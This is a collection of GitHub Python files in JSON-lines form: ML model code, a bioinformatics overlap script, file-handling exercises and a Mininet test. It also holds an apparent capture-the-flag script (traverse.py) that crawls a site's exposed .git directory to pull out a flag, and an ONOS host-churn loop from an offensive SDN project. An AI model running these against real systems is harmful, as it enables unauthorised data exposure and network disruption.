[str(num)[0],str(num)[1],str(num)[2]])\n if (a**3 + b**3 + c**3) == num:\n print(num, end=' ')\n flag = False\n if flag:\n print('no', end=' ')\n print()","repo_name":"xichie/pythonCode","sub_path":"练习/考试/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6992572774","text":"import argparse\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport sys\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(os.path.dirname(BASE_DIR))\nsys.path.append(ROOT_DIR)\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\nsys.path.append(os.path.join(ROOT_DIR, 'utils'))\nsys.path.append(os.path.join(os.path.dirname(BASE_DIR), 'data'))\nimport data_off\nimport pymesh\nimport cv2\nimport model_vgg as model\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=str, default='0', help='GPU to use [default: GPU 0]')\nparser.add_argument('--log_dir', default='/home/laughtervv/Documents/projects/pointnet_ffd/shapenet/rendered_img/checkpoint/all_vgg_template_lap_recon_lr4_ftfromchair_multigpu_cont_fixbatch_fixspace_cont', help='Log dir [default: log]')\nFLAGS = parser.parse_args()\n\nGPU_INDEX = FLAGS.gpu\nPRETRAINED_MODEL_PATH = FLAGS.log_dir\nNUM_POINTS = 2048\nIMG_SIZE = 137\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU_INDEX\n\ndef pc_normalize(pc):\n\n \"\"\" pc: NxC, return NxC \"\"\"\n l = pc.shape[0]\n\n centroid = np.mean(pc, axis=0)\n\n pc = pc - centroid\n m = np.max(np.sqrt(np.sum(pc ** 2, axis=1)))\n\n pc = pc / m\n\n return pc\n\ndef demo():\n with tf.device('/gpu:0'):\n for i in range(2,4):\n src_verts, src_tris = data_off.read_off('%02d_input.off' % i)\n src_verts = pc_normalize(src_verts)\n mesh = pymesh.form_mesh(src_verts, src_tris)\n mesh, _ = pymesh.split_long_edges(mesh, 0.03)\n src_verts, src_tris = mesh.vertices, mesh.faces\n ref_img = cv2.imread('%02d_ref.png' % i, cv2.IMREAD_UNCHANGED)[:,:,:3].astype(np.float32) / 255.\n # ref_img = cv2.imresize(ref_img, (137,137))\n # cv2.imwrite('%02d_ref.png' % i, (ref_img * 255).astype(np.int8))\n # print(ref_img.shape)\n # print(ref_img.shape)\n\n src_mesh = model.mesh_placeholder_inputs(1, src_verts.shape[0], src_tris.shape[0], (IMG_SIZE,IMG_SIZE), 'src')\n ref_mesh = model.mesh_placeholder_inputs(1, src_verts.shape[0], src_tris.shape[0], (IMG_SIZE,IMG_SIZE), 'ref')\n is_training_pl = tf.placeholder(tf.bool, shape=())\n\n end_points = model.get_model(src_mesh, ref_mesh, NUM_POINTS, is_training_pl)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n sess = tf.Session(config=config)\n\n # Init variables\n init = tf.global_variables_initializer()\n sess.run(init)\n\n saver = tf.train.Saver() \n ckptstate = tf.train.get_checkpoint_state(PRETRAINED_MODEL_PATH)\n if ckptstate is not None:\n LOAD_MODEL_FILE = os.path.join(PRETRAINED_MODEL_PATH, os.path.basename(ckptstate.model_checkpoint_path))\n saver.restore(sess, LOAD_MODEL_FILE)\n print( \"Model loaded in file: %s\" % LOAD_MODEL_FILE)\n\n else:\n print( \"Fail to load modelfile: %s\" % PRETRAINED_MODEL_PATH)\n return\n\n\n feed_dict = {is_training_pl: False,}\n feed_dict[src_mesh['verts']] = np.expand_dims(src_verts, axis = 0)\n feed_dict[src_mesh['nverts']] = np.expand_dims([src_verts.shape[0]], axis = 0)\n feed_dict[src_mesh['tris']] = np.expand_dims(src_tris, axis = 0)\n feed_dict[src_mesh['ntris']] = np.expand_dims([src_tris.shape[0]], axis = 0)\n\n feed_dict[ref_mesh['verts']] = np.expand_dims(src_verts, axis = 0) # not using\n feed_dict[ref_mesh['nverts']] = np.expand_dims([src_verts.shape[0]], axis = 0) # not using\n feed_dict[ref_mesh['tris']] = np.expand_dims(src_tris, axis = 0) # not using\n feed_dict[ref_mesh['ntris']] = np.expand_dims([src_tris.shape[0]], axis = 0) # not using\n feed_dict[ref_mesh['imgs']] = np.expand_dims(ref_img, axis = 0)\n\n \n pred_verts_val = sess.run(end_points['pred_verts'], feed_dict=feed_dict)\n data_off.write_off('%02d_deformed.off' % i, pred_verts_val[0,:,:], src_tris)\n tf.reset_default_graph()\n\n\nif __name__ == \"__main__\":\n demo()","repo_name":"laughtervv/3DN","sub_path":"shapenet/2D/demo_2D.py","file_name":"demo_2D.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"72336773907","text":"'''\n@Description: This is the basis model of the \n@Author: your name\n@Date: 2019-07-13 22:55:34\n@LastEditTime: 2019-07-22 16:54:44\n@LastEditors: Please set LastEditors\n'''\nimport tensorflow as tf \nfrom tensorflow.python import debug as tf_debug\nimport abc\nfrom functools import reduce\nimport datetime\nimport numpy as np\nclass Model(object):\n \"\"\"\n this is the basis model\n :param object: \n \"\"\"\n def __init__(self,opt):\n # initialize the parameters\n for key, value in opt.items():\n self.__setattr__(key, value)\n\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=sess_config)\n self.para = []\n self.build_graph()\n # summary\n self.merged = tf.summary.merge_all()\n # self.train_writer = tf.summary.FileWriter(self.summaries_dir + '/train',\n # self.sess.graph)\n # self.test_writer = tf.summary.FileWriter(self.summaries_dir + '/test')\n self.saver = tf.train.Saver()\n self.sess.run(tf.global_variables_initializer())\n\n # whether debug the code\n # if self.debug:\n # self.sess = tf_debug.LocalCLIDebugWrapperSession(self.sess)\n def _create_placeholder(self):\n self.sentence = tf.placeholder(tf.int32,[None,self.max_input_sentence],name = 'input_question')\n self.input_y = tf.placeholder(tf.float32, [None,2], name = \"input_y\")\n self.sentence_position = tf.placeholder(tf.int32,[None,self.max_input_sentence],name = 'q_position')\n \n @abc.abstractmethod\n def _get_embedding(self):\n \"\"\"\n abstract method\n :param self: \n \"\"\"\n def _feed_neural_work(self):\n with tf.name_scope('regression'):\n regularizer = tf.contrib.layers.l2_regularizer(self.l2_reg_lambda)\n W = tf.get_variable(\n \"W_output\",\n shape = [self.embedding_dim, 2],\n initializer = tf.contrib.layers.xavier_initializer(),\n regularizer=regularizer)\n b = tf.get_variable('b_output', shape=[2],initializer = tf.random_normal_initializer(),regularizer = regularizer)\n self.para.append(W)\n self.para.append(b)\n self.logits = tf.nn.xw_plus_b(self.represent, W, b, name = \"scores\")\n self.scores = tf.nn.softmax(self.logits)\n self.predictions = tf.argmax(self.scores, 1, name = \"predictions\")\n\n def _create_loss(self):\n l2_loss = tf.constant(0.0)\n for p in self.para:\n l2_loss += tf.nn.l2_loss(p)\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits = self.logits, labels = self.input_y)\n self.loss = tf.reduce_mean(losses) + self.l2_reg_lambda*l2_loss\n\n with tf.name_scope(\"accuracy\"):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, \"float\"), name=\"accuracy\")\n\n def _create_op(self):\n \n self.global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n self.train_op = self.optimizer.apply_gradients(\n self.grads_and_vars, global_step=self.global_step)\n\n def variable_summaries(self, var):\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n @staticmethod\n def _model_stats():\n \"\"\"Print trainable variables and total model size.\"\"\"\n\n def size(v):\n return reduce(lambda x, y: x * y, v.get_shape().as_list())\n print(\"Trainable variables\")\n for v in tf.trainable_variables():\n print(\" %s, %s, %s, %s\" %\n (v.name, v.device, str(v.get_shape()), size(v)))\n print(\"Total model size: %d\" % (sum(size(v)\n for v in tf.trainable_variables())))\n\n\n def _train(self,data_batch,i):\n\n for data in data_batch:\n sentence,flag,position = zip(*data)\n feed_dict = {\n self.sentence: sentence,\n self.input_y: flag,\n self.sentence_position: position\n }\n _, step, loss, accuracy = self.sess.run(\n [self.train_op, self.global_step, self.loss, self.accuracy],feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g} \".format( time_str, step, loss, accuracy))\n def _predict(self,data_batch):\n scores = []\n for data in data_batch:\n sentence,_,position = zip(*data)\n feed_dict = {\n self.sentence: sentence,\n self.sentence_position: position\n }\n score = self.sess.run(self.scores, feed_dict)\n scores.extend(score)\n return np.array(scores)\n\n def build_graph(self):\n self._create_placeholder()\n self._get_embedding()\n self._feed_neural_work()\n self._create_loss()\n self._create_op()\n\n\n\n","repo_name":"zhaodongh/Encoding-Word-Order-in-Complex-valued-Embedding","sub_path":"Fasttext/model_fasttext/basic_model.py","file_name":"basic_model.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"48"} +{"seq_id":"10658136246","text":"#!/usr/bin/env python\nimport sys\nfrom datetime import datetime, date, time\n\n# Debugging variables\ndebug = True\nunit_test = True\n\ndef func1():\n return\n\nseqs = []\nseq = \"\"\nnumseq=[]\nseq_id=[]\n\n#a=0,c=1,g=2,t=3\n\nread_fname = \"lab01.fasta\"\n#read_fname = \"sample_data/sample.fasta\"\nfor line in open(read_fname):\n line = line.strip()\n if line[0] == '>':\n if seq != \"\":\n for i in range(0,len(seq)):\n if seq[i]=='a':\n numseq.append(0)\n elif seq[i]=='c':\n numseq.append(1)\n elif seq[i]=='g':\n numseq.append(2)\n else:\n numseq.append(3)\n seqs.append([seq_id, numseq])\n seq_id = line[1:]\n seq = \"\"\n numseq=[]\n else:\n seq += line\n\nif seq != \"\":\n for i in range(0,len(seq)):\n if seq[i]=='a':\n numseq.append(0)\n elif seq[i]=='c':\n numseq.append(1)\n elif seq[i]=='g':\n numseq.append(2)\n else:\n numseq.append(3)\n seqs.append([seq_id, numseq])\n \nlengthofseqs=len(seqs) \nlengthofnumseq=len(seqs[0][1])\n\ntempfront=[]\ntemprear=[]\ntemp=[]\nreversetemp=[]\n\ndef simple_overlap(a, b):\n def simple_overlap_dir(a, b):\n for i in range(len(a)):\n same = True\n for j in range(len(a) - i):\n if a[j] != b[i + j]:\n same = False\n break\n if same and len(a) - i >= 40:\n return len(a) - i\n return None\n\n b_rc = reversecomplement(b)\n olp = simple_overlap_dir(a, b)\n if olp != None:\n return 'F', olp\n olp = simple_overlap_dir(b, a)\n if olp != None:\n return 'F', -olp\n simple_overlap_dir(a, b_rc)\n simple_overlap_dir(b_rc, a)\n \n return None, None\n \n\ndef jj_overlap(a, b):\n tempfront=a[:20]\n temprear=a[-20:]\n reversetemp=reversecomplement(b)\n for k in range(20,lengthofnumseq-20):\n b[k:k+20]\n if temprear==temp:\n if 21+k> overlap_file, seqs[i][0], seqs[j][0], \"F\",lengthofnumseq-k-20\n temp=reversetemp[k:k+20] \n if temprear==temp:\n if 21+k> overlap_file, seqs[i][0], seqs[j][0], \"R\",lengthofnumseq-k-20\n temp=seqs[j][1][-k-20:-k] \n if tempfront==temp:\n if 21+k> overlap_file, seqs[i][0], seqs[j][0], \"F\",k+20-lengthofnumseq\n\n temp=reversetemp[-k-20:-k] \n if tempfront==temp:\n if 21+k> overlap_file, seqs[i][0], seqs[j][0], \"R\",k+20-lengthofnumseq\n\n\ndef reversecomplement(arr):\n arrs = []\n i=0\n for i in range(len(arr)):\n arrs.append(3-arr[i])\n arrs=arrs[::-1] \n return arrs\n\n# Unit tests\nif unit_test:\n test1 = [\"tttggtgtgtgcacaagttaagtcgtgtacgcgtgggacaacctacactcttcgtcgtaccggatgcacgactgtgacgtactgaggtagcctaaggacgaaatgctttacgttgccagtcctgtaaacggggccaagaccgtccaagtcccaaccacctaggcccccgataatgcccgcgatggagacggaaatggagaggtgaacgtcagccccggccccgccgatcctattcgctgagtatagacgg\", \"cgatggagacggaaatggagaggtgaacgtcagccccggccccgccgatcctattcgctgagtatagacggagcgcgtacagtgccatgtgaatggcgcgggcatgcacgacataagttgaaggggggaaaaggccatctctggcttagtgcgattaagccccgccgtacccgcccctgcctggcgtcgacgacgacgcgcgacaacgaacagacacggcgcaagatagatgacccttgcttgatcttaa\", ['F', 179]]\n\n tests = [test1]\n for seq1, seq2, ans in tests:\n my_ans = jj_overlap(seq1, seq2)\n assert my_ans == ans\n\nprint >> sys.stderr, \"Begin at\", str(datetime.now())\noverlap_file = open(\"lab01.olaps\", \"w\")\nfor i in range(lengthofseqs):\n for j in range(i+1, lengthofseqs):\n jj_dir, jj_olap = jj_overlap(a, b)\n if debug:\n s_dir, s_olap = simple_overlap(a, b)\n if jj_dir != s_dir or jj_olap != s_olap:\n print >> sys.stderr, \"Something went wrong in JJ overlapping!\"\n \n\n \noverlap_file.close()\nprint >> sys.stderr, \"Ends at\", str(datetime.now())\n","repo_name":"leejj82/compbio","sub_path":"lab1/3. Old_Code/hw17_Daehwan'sEdition.py","file_name":"hw17_Daehwan'sEdition.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23010600104","text":"\"\"\"\nThis does hash-specific testing:\n- precision within hamming radius\n- precision vs. recall curve\n\"\"\"\nimport torch, itertools, os\nfrom ml_toolkit.hash_toolkit.metrics.precision_recall import get_mean_avg_precision, calculate_precision_recall, get_precision_vs_recall, \\\n plot_avg_precision_vs_recall\n\nfrom expr_suites.upper_bound.testing_utils import _get_data_loader, _construct_hash_function, _create_label_hash_dicts, _load_models_from_path, _save_hash_code\n\n# ml_test hashing performance\ndef testing(params,models,query_data_loader,db_data_loader,use_specific_code,use_shared_code,model_def):\n \"\"\"\n :param models: a dict {name:model_obj}\n :param query_data_loader: a torch.utils.dataloader\n :param db_data_loader: a torch.utils.dataloader\n :return: return a dict {'results':[],'records':{filename:content}}\n \"\"\"\n query_labels = []\n db_labels = []\n query_hash_ls = []\n db_hash_ls = []\n # 1. hash the whole db set and query set\n hash_model = _construct_hash_function(models=models,params=params,use_specific_code=use_specific_code,use_shared_code=use_shared_code,model_def=model_def)\n for i,(images,labels) in enumerate(db_data_loader):\n db_hash_ls += hash_model(images)\n db_labels += labels.numpy().tolist()\n for i, (images, labels) in enumerate(query_data_loader):\n query_hash_ls += hash_model(images)\n query_labels += labels.numpy().tolist()\n print(\"hashing finished\")\n\n # 2. format data for ml_test\n db_set = _create_label_hash_dicts(hash_ls=db_hash_ls, label_ls=db_labels)\n query_set = _create_label_hash_dicts(hash_ls=query_hash_ls, label_ls=query_labels)\n\n # 3. do query for each data in `query_set`, compute precision, recall\n precision_recall_results = calculate_precision_recall(radius=params.precision_radius, db_set=db_set, test_set=query_set)\n print(\"finish calculating precision recalls\")\n\n # plot precision vs. recall\n pr_dict = get_precision_vs_recall(test_set=query_set,db_set=db_set,max_hdist=16)\n precision_recall_dict = plot_avg_precision_vs_recall(pr_list=pr_dict,popup=False)\n precision_recall_plot = precision_recall_dict[\"plot\"]\n\n # 4. collect ml_test records\n test_results = {\n \"precision-recall-results\": precision_recall_results, # a dict\n \"precision-vs-recall\":{\n \"precisions\": precision_recall_dict[\"avg_precisions\"],\n \"recalls\": precision_recall_dict[\"avg_recalls\"] # for later plotting precision-recall curve\n }\n }\n test_records = {\n \"precision-recall-curve.jpg\": precision_recall_plot,\n \"db_set\": db_set,\n \"query_set\": query_set\n }\n\n return {\n \"results\":test_results,\n \"records\": test_records\n }\n\n\n# this is a simple wrapper of `ml_test()`\ndef run_simple_test(params,saved_model_path, model_def, save_hash_to=None):\n \"run a test with no cross validation, params should contain `use_specific_code`\"\n # 1. load data\n query_loader, query_fns = _get_data_loader(path=params.test_data_path[\"query\"], params=params,shuffle=False)\n db_loader, db_fns = _get_data_loader(path=params.test_data_path[\"db\"], params=params,shuffle=False)\n # 2. load models\n models = _load_models_from_path(params=params, saved_model_path=saved_model_path,model_def_module=model_def)\n\n # 3. run ml_test\n test_results = testing(params=params, query_data_loader=query_loader, db_data_loader=db_loader,\n models=models,use_specific_code=params.use_specific_code,use_shared_code=params.use_shared_code,model_def=model_def)\n # save hash code\n if (save_hash_to is not None):\n assert len(test_results[\"records\"][\"db_set\"]) == len(db_fns)\n assert len(test_results[\"records\"][\"query_set\"]) == len(query_fns)\n _save_hash_code(item_set=test_results[\"records\"][\"db_set\"],fns=db_fns,\n save_to=os.path.join(save_hash_to,\"db.csv\"))\n _save_hash_code(item_set=test_results[\"records\"][\"query_set\"], fns=query_fns,\n save_to=os.path.join(save_hash_to, \"query.csv\"))\n return test_results\n\n","repo_name":"MarkusZhang/concat-hash","sub_path":"expr_suites/upper_bound/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42636261753","text":"f=open('top-100.txt','rt')\r\nprint(f.read())\r\nprint(f.readlines()) #contain line\\n, show output as array\r\n#if we use readlines() again,it will show empty array.We need to use f.seek(0) to start from beginning\r\nf.seek(0)\r\nprint(f.readlines())\r\nfor line in f:\r\n print(line.strip())\r\nf.close()\r\n\r\n#open and write file (overwritten)\r\nf=open('test.txt','w')\r\nf.write(\"test line\")\r\nf.close()\r\n#not overwritten file but append text in file\r\nf=open('text.txt','a')\r\nf.write(\"test line2\")\r\nf.close()\r\n\r\nprint(f.name()) #text.txt\r\nprint(f.closed()) #true\r\nprint(f.mode()) #a \r\n\r\nprint(\"----------------\")\r\nwith open('rockyou.txt', encoding='latin-1') as f:\r\n for line in f:\r\n pass","repo_name":"Thanasornsawan/Python-learning","sub_path":"RWfile.py","file_name":"RWfile.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28799232554","text":"#!/usr/bin/python \n \nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.node import RemoteController\nfrom mininet.util import dumpNodeConnections\nfrom mininet.log import setLogLevel\nfrom mininet.cli import CLI\nimport time\nimport sys\n\nclass SingleSwitchTopo(Topo):\n \"Single switch connected to n hosts.\"\n def build(self, n=4):\n switch1 = self.addSwitch('s1')\n h1 = self.addHost('h1')\n self.addLink(switch1, h1)\n switch2 = self.addSwitch('s2')\n h2 = self.addHost('h2')\n self.addLink(switch2, h2)\n switch3 = self.addSwitch('s3')\n h3 = self.addHost('h3')\n self.addLink(switch3, h3)\n switch4 = self.addSwitch('s4')\n h4 = self.addHost('h4')\n self.addLink(switch4, h4)\n\ndef read_input():\n if len(sys.argv) != 3:\n print(\"usage: python {} n remote-ip; where n is the number of hosts and remote-ip the IP of ONOS\".format(sys.argv[0]))\n sys.exit(1)\n return int(sys.argv[1])\n\ndef start(input):\n topo = SingleSwitchTopo(n=input)\n net = Mininet(topo)\n c0 = RemoteController('c0', ip=sys.argv[2], port=6653 )\n net.addController(c0)\n net.start()\n return net\n\ndef simpleTest(net):\n print( \"Dumping host connections\" )\n dumpNodeConnections(net.hosts)\n print( \"Testing network connectivity\" )\n net.pingAll()\n\ndef connTest(net):\n print( \"Testing host connections\" )\n while True:\n net.addHost('h5')\n s4 = net.get('s4')\n net.addLink(s4, net.get('h5'))\n s4.attach('s4-eth3')\n net.get('h5').cmd('ifconfig h5-eth0 10.0.0.5')\n\n # pingall\n net.get('h5').cmd('ping -c 1 10.0.0.1')\n net.get('h5').cmd('ping -c 1 10.0.0.2')\n net.get('h5').cmd('ping -c 1 10.0.0.3')\n net.get('h5').cmd('ping -c 1 10.0.0.4')\n \n # delete host\n net.delHost(net.get('h5'))\n \n\ndef stop(net):\n net.stop()\n\nif __name__ == '__main__':\n # Tell mininet to print useful information\n setLogLevel('info')\n n = read_input()\n net = start(n)\n print(\"Sleeping for five seconds...\")\n time.sleep(5)\n simpleTest(net)\n connTest(net)\n net.run(CLI, net)\n","repo_name":"edoardottt/offensive-onos","sub_path":"tests/mininet/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"40858838876","text":"import re\nimport requests\nfrom init import domain, flag_pattern\n\n\ndir_pattern = r'\\1<\\/a><\\/td>'\n\n\ndef traverse(path):\n response = requests.get(path).text\n if re.search(flag_pattern, response) is not None:\n return re.search(flag_pattern, response).group(0), path\n\n sub_dirs = re.findall(dir_pattern, response)\n for sub_dir in sub_dirs:\n res = traverse(f\"{path}{sub_dir}\")\n if res is not None:\n return res\n return None\n\n\ntest_path = f\"{domain}test/.git/\"\nflag, url = traverse(test_path)\nprint(f\"Flag found at {url}\")\nprint(flag)\n","repo_name":"LOOP115/Plutus","sub_path":"traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70666988625","text":"# Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles que forem pares.\n\nsp = 0\nnp = 0\nni = 0\n\nfor c in range(1, 7):\n n = int(input('Insira o {}° dos 6 números inteiros: '.format(c)))\n if n % 2 == 0:\n sp += n\n np += 1\n\nif np != 0:\n print('\\nA soma dos {} números pares inseridos foi igual a {}'.format(np, sp))\n\nelif np == 0:\n print('\\nNenhum número par foi inserido, logo, a soma dos pares foi igual a 0')","repo_name":"GabrielVitorino28/Python","sub_path":"projetos-basicos/49_soma_de_pares.py","file_name":"49_soma_de_pares.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8950048193","text":"#Bloom filter\nfrom pybloom import BloomFilter\nfrom random import randrange\nimport numpy.random as nprnd\n\n#### How does it work for a range of numbers?\nf = BloomFilter(capacity=10000, error_rate=0.001)\n[f.add(x) for x in range(10000)]\nsum = 0\nfor i in range(10000):\n #print(i in f)\n sum = sum + (i in f)\nprint(\"Accuracy for range of numbers\",(sum/10000)*100)\n#### How does it work for random numbers?\nf = BloomFilter(capacity=10000, error_rate=0.001)\nrandomNumbers = nprnd.randint(10000000, size=10000)\n[f.add(x) for x in randomNumbers]\nsum = 0\nfor i in range(10000):\n #print(i in f)\n sum = sum + (i in f)\nprint(\"Accuracy for random numbers\",(sum/10000)*100)\n\n\n#Locally sensityve hash function\nfrom lshash import LSHash\nlsh = LSHash(6, 8)\nlsh.index([1,2,3,4,5,6,7,8])\nlsh.query([6.8], num_results=None, distance_func=\"euclidean\")\n","repo_name":"arunkishore/randomScripts","sub_path":"bloomFilter_and_LSH.py","file_name":"bloomFilter_and_LSH.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25707136800","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__)))\n\nfrom pandas import DataFrame\nfrom pathlib import Path\nfrom fn import read_data\n\ndef n_rows(file_name: str) -> int:\n \"\"\"Count number of rows in datase\n\n Args:\n file_name (str): name of the data file\n\n Returns:\n rows (int): number of rows in dataset\n \"\"\"\n\n f_path: Path = Path(__file__).parents[2]/\"data\"/file_name\n file: DataFrame = read_data(f_path)\n\n rows: int = len(file)\n\n return rows\n\ndef count_na_by_col(file_name: str) -> DataFrame:\n \"\"\"Count NA values for every column\n\n Args:\n file_name (str): name of the data file\n\n Returns:\n na_count (DataFrame): DataFrame with the count of NA values by column in original dataset\n \"\"\"\n\n f_path: Path = Path(__file__).parents[2]/\"data\"/file_name\n\n print(\"# Reading file...\")\n data: DataFrame = read_data(f_path)\n\n cols: list[str] = list(data.columns)\n\n na_count: DataFrame = DataFrame(\n columns=cols\n )\n\n print(\"# Counting NaN values by col..\")\n for col in cols:\n \n na_count_temp: int = data[col].isna().sum()\n na_count[col] = [na_count_temp]\n\n print(f\"# ...{col}: {na_count_temp} NaN values\")\n\n print(\"-\"*20)\n\n return na_count\n\n\nif __name__ == \"__main__\":\n pass\n # print(count_na_by_col(\"heart.csv\"))\n","repo_name":"SirAymane/Heart-Disease-Dataset","sub_path":"scripts/marc/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4073137289","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ceph', '0005_cephpool_percent_used'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cephosd',\n name='osd_objectstore',\n field=models.CharField(max_length=15, null=True, editable=False),\n preserve_default=True,\n ),\n ]\n","repo_name":"openattic/openattic","sub_path":"backend/ceph/migrations/0006_cephosd_osd_objectstore.py","file_name":"0006_cephosd_osd_objectstore.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"74537029586","text":"import torch\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pymannkendall as mk\nimport matplotlib as mpl\n\nlabels = {'conv': 'FF', 'rnn': 'RNN', 'reciprocal': 'RGC', 'gru': 'GRU', 'lstm': 'LSTM', 'hgru': 'hGRU',\n 'fgru': 'fGRU', 'gamma': '$\\gamma$-Net'}\n\ncolorseq = [mpl.colors.to_rgb(mpl.colors.TABLEAU_COLORS[k]) for k in mpl.colors.TABLEAU_COLORS]\n\ndef man_kendall_test(values):\n return mk.original_test(values).p\n\ndef plot_imagenet_accs(all_accs, out_file, fdr: float, show = False):\n plt.rcParams.update({\n 'font.size': 15,\n 'figure.figsize': (8, 5),\n 'axes.spines.right': False,\n 'axes.spines.top': False\n })\n plt.figure()\n\n\n for idx, (name, accs) in enumerate(all_accs.items()):\n color = colorseq[idx+1]\n p = man_kendall_test(accs[:8])\n print(f'p-value for {name}: {p}')\n l_name = labels[name] + ' (*)' if p < fdr else labels[name]\n xs = np.arange(1, len(accs) +1, 1)\n plt.plot(xs,accs, label=l_name, color=color)\n\n plt.legend(loc=\"upper left\")\n plt.ylabel('Top1-Accuracy')\n plt.xlabel('Timesteps')\n plt.title(f'Accuracy over time on imagenet')\n plt.savefig('../figures/' + out_file)\n if show:\n plt.show()\n\ndef load_val_file(filename: str):\n # Load RSA results\n saved_state = torch.load(filename)\n acc = saved_state[\"accuracy\"]\n return acc\n\n\n\nif __name__ == '__main__':\n all_accs = dict()\n\n all_accs['rnn'] = load_val_file('../results/imagenetval/2023-06-24-02-43_timeseries_rnn-ts7.pt')\n all_accs['reciprocal'] = load_val_file('../results/imagenetval/2023-07-01-20-42_timeseries_reciprocal-ts7.pt')\n all_accs['gru'] = load_val_file('../results/imagenetval/2023-07-01-18-53_timeseries_gru-ts7.pt')\n all_accs['lstm'] = load_val_file('../results/imagenetval/2023-07-01-19-58_timeseries_lstm-ts7.pt')\n all_accs['hgru'] = load_val_file('../results/imagenetval/2023-07-01-22-30_timeseries_hgru-ts7.pt')\n all_accs['fgru'] = load_val_file('../results/imagenetval/2023-07-01-23-11_timeseries_fgru-ts7.pt')\n\n plot_imagenet_accs(all_accs,'../figures/imagenet_trend_test.pdf', 0.00833)\n","repo_name":"simon-birkholz/shape-processing-rnns","sub_path":"experiments/plot_imagenet.py","file_name":"plot_imagenet.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22942524350","text":"#Desafío 4\n#Escribir un programa que cargue una tupla con nombres de especie, y para cada nombre de especie\n#imprima el mensaje Hola soy ......, cuidame.\n#Modificá el programa anterior y dada una posición inicial p y una cantidad n, imprima el mensaje\n#anterior para los n nombres que se encuentran a partir de la posición i.\n\ntupla = ('vaca', 'caballo', 'pato', 'paloma', 'gallina', 'raton', 'puma', 'oso', 'ganzo')\n\nfor i in tupla:\n print(f'Hola soy {i}, cuidame!')\n\n\n\n","repo_name":"MatiasBella/EstructuraDatos","sub_path":"ListaTuplaDiccionarioComplementario/LTD_Desafio4.py","file_name":"LTD_Desafio4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8337446275","text":"\"\"\"Functions for reducing omics dataset features to improve DRP performance\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef fs_landmark(omics_df):\n \"\"\"Feature Selection method for omics dataframes where feature names contain gene names. \n Filters omics dataframe features to only keep features with column names containing landmark genes \n \"\"\"\n\n # create list of landmark genes\n landmark_genes_df = pd.read_csv(\"datasets/landmark_genes_LINCS.txt\",sep='\\t')\n landmark_genes = landmark_genes_df['Symbol']\n # find all phosphosites in landmark genes\n landmark_features = []\n for feature in omics_df.columns:\n for gene in landmark_genes:\n if gene in feature:\n landmark_features.append(feature)\n # remove duplicates\n landmark_features = list(dict.fromkeys(landmark_features))\n\n return landmark_features\n\n\n\ndef fs_landmark_targets(phos_df):\n \"\"\"Feature Selection method for 